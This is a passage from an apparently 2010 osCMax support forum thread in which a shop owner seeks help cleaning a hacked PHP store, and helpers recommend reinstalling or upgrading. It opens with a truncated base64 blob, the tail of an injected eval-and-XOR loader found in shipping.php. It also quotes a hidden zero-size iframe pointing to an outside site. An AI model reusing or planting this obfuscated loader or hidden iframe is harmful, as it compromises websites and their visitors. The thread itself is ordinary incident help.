MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs3MTs5Mjs5Mjs5Mjs5Mj s5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzE0OzI1Ozg7OTsx NDsxODs5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mj s2OTs3Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2 OTs2MTs3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs3MT s5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7 OTI7OTI7MjY7OTsxODszMTs4OzIxOzE5OzE4OzkyOzE3OzE0Oz E5OzMwOzIwOzg0Ozg4OzQ2OzU3OzY4Ozc4OzU3OzU3OzY5OzYy Ozc3Ozc4Ozc3OzU4Ozc1Ozc2OzY5OzY4OzY5OzczOzU3OzU4Oz czOzcyOzU3OzYyOzYxOzc1OzU4OzYxOzc0OzYyOzc1OzY4OzYy Ozg1Ozc7OTI7OTI7OTI7OTI7OTI7NTI7MjU7Mjk7MjQ7MjU7MT Q7ODQ7OTE7NjM7MTk7MTg7ODsyNTsxODs4OzgxOzU3OzE4OzMx OzE5OzI0OzIxOzE4OzI3OzcwOzkyOzE4OzE5OzE4OzI1OzkxOz g1OzcxOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzYxOzc3Ozc1OzY5 OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4OzY4OzYzOz c5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOzc3OzYyOzY4 Ozc3OzU2OzU3OzY1OzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7OD Q7ODg7NDY7NTc7Njg7Nzg7NTc7NTc7Njk7NjI7Nzc7Nzg7Nzc7 NTg7NzU7NzY7Njk7Njg7Njk7NzM7NTc7NTg7NzM7NzI7NTc7Nj I7NjE7NzU7NTg7NjE7NzQ7NjI7NzU7Njg7NjI7ODU7NzE7OTI7 OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7MTI7MTQ7MjU7Mj c7MzU7MTc7Mjk7ODszMTsyMDs4NDs5MTs4MzszMjs2NDszMjs4 MzszMDsxOTsyNDs1OzgzOzE1OzIxOzkxOzgwOzg4OzQ2OzYxOz c3Ozc1OzY5OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4 OzY4OzYzOzc5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOz c3OzYyOzY4Ozc3OzU2OzU3Ozg1Ozg1Ozc7OTI7OTI7OTI7OTI7 OTI7OTI7MTQ7MjU7ODs5OzE0OzE4OzkyOzEyOzE0OzI1OzI3Oz M1OzE0OzI1OzEyOzE2OzI5OzMxOzI1Ozg0OzkxOzgzOzg0OzMy OzY0OzMyOzgzOzMwOzE5OzI0OzU7Mzk7MzQ7MzI7NjY7MzM7OD Y7MzI7NjY7ODU7ODM7MTU7MjE7OTE7ODA7Mjc7MTc7MTY7ODQ7 ODU7ODI7OTQ7MzI7MTg7OTQ7ODI7OTE7ODg7Nzc7OTE7ODA7OD g7NDY7NjE7Nzc7NzU7Njk7NjE7NjI7NTY7Nzk7NjE7NzU7NjI7 Njk7NTc7Nzg7Njg7NjM7Nzk7NzQ7Njk7NTg7NzU7NjI7NzM7Nj k7NjM7NzM7Nzc7NjI7Njg7Nzc7NTY7NTc7ODU7NzE7OTI7OTI7 OTI7OTI7OTI7MTsyNTsxNjsxNTsyNTs3OzkyOzkyOzkyOzkyOz kyOzkyOzE0OzI1Ozg7OTsxNDsxODs5Mjs4ODs0Njs2MTs3Nzs3 NTs2OTs2MTs2Mjs1Njs3OTs2MTs3NTs2Mjs2OTs1Nzs3ODs2OD s2Mzs3OTs3NDs2OTs1ODs3NTs2Mjs3Mzs2OTs2Mzs3Mzs3Nzs2 Mjs2ODs3Nzs1Njs1Nzs4MjsyNzsxNzsxNjs4NDs4NTs3MTs5Mj s5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7 OTI7MTk7MzA7MzU7MTU7ODsyOTsxNDs4Ozg0OzkxOzE3OzE0Oz E5OzMwOzIwOzkxOzg1OzcxOzkyOzkyOzkyOzE7OTI7OTI7MTsi KTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJH ouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>
<?php
/*
$Id: shipping.php 3 2006-05-27 04:59:07Z user $


I'm using a MAC and the security is very good.

so i need to go through ALL the files and deleted the ... eval(base64_decode("JGs9MTI0O etc etc part

or would it be easier to just download the latest version and replace the files, is that right? is that how you upgrade? ive never done it before!

The site changes are mainly design changes, i've removed the right column and added links in the header. Changed all the buttons. With the hack have infected picture files?

thanks again,

Michelle

I only use paypal, no credit card details, they process payments. thank god!

michelle
02-02-2010, 01:18 PM
Your right again, on some of my older product pages there was a this link:

<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>

oh god I'm completely infected! this can't be good!

thanks

pgmarshall
02-02-2010, 01:30 PM
Ah ha! A mac user ... your mac should be okay (still worth checking for virus/keyloggers/trojans) ... but the server where you are hosting is not!

Unfortunately, the upgrade is not merely a drag and drop process ... there have been some significant changes since RC3 (http://www.oscmax.com/forums/oscmax-v2-announcements/17834-oscmax-2-0-rc4-released.html). I think a re-install would be the best course of action ... how much traffic do you get through your site?

No they will not have infected your images ... I don't think that is possible!

So the design changes are done by you in a template? I note you have a BLOG ... are you using the article manager to handle this?

Regards,

michelle
02-02-2010, 01:37 PM
will check for that on my MAC

a fair amount of traffic, Usage Statistics for www.birdys-boutique.co.uk - Summary by Month (http://stats.birdys-boutique.co.uk/)

The blog is using the article manager.

I'm going to buy a PHP security book and read it cover to cover! :)

Is it easy to re-install? do i need to clear the hack / virus problems first?

I think this will take me a lot of work to get my pretty site back!

thanks for all your help!

pgmarshall
02-02-2010, 01:59 PM
Who is your host? Your domain name looks like a sub-domain rather than staying on Birdy's Boutique (http://www.birdys-boutique.co.uk/) ... once I enter your site your are on birdy001.secure.omnis.com which is a bit odd - you don't need to have your entire site on a shared SSL.

Don't bother buying a book on PHP security! If you can find one ... all you need to do is to keep in touch with osCMax ... sign up for the newsletter ... Michael posts all the security updates from here ... they let you know when you need to make changes ... it is all very well explained and simple to do ... the problems arise when you leave it for a long time and then it can mount up a bit!

I think your time would be better spent re-building your site on the 2.0.4 platform (or upgrading to it) rather than manually trying to remove a base64 hack ... especially since you are not entirely familiar with PHP.

Regards,

michelle
02-02-2010, 02:07 PM
My host is omnis ( Web Hosting by Omnis Network (http://www.omnis.com)).

I think my host put my site on that ssl sub domain link, with oscmax don't you have to buy the ssl? and my host said i could do it this way as the ssl was included in the hosting package.

Sorry to be a pain, but what's the best way to go about doing this?
Would it be to download the new version?
and then delete the catalog from my FTP and install the new version?
then start all over again, i will loose my customers and orders, won't i?
or do you go into each folder and replace the files?

thanks

pgmarshall
02-02-2010, 02:26 PM
Yep ... you have a shared SSL but you only need to secure the admin and payment pages ...

If you want to keep your old orders and other information you will need to back it up and reinstall them into the new site

OR

follow the upgrade path ...

Your choice ...

Regards,

ridexbuilder
02-02-2010, 02:49 PM
Thought PGM might've offered to do the work? :poke:
[He's never too busy :p]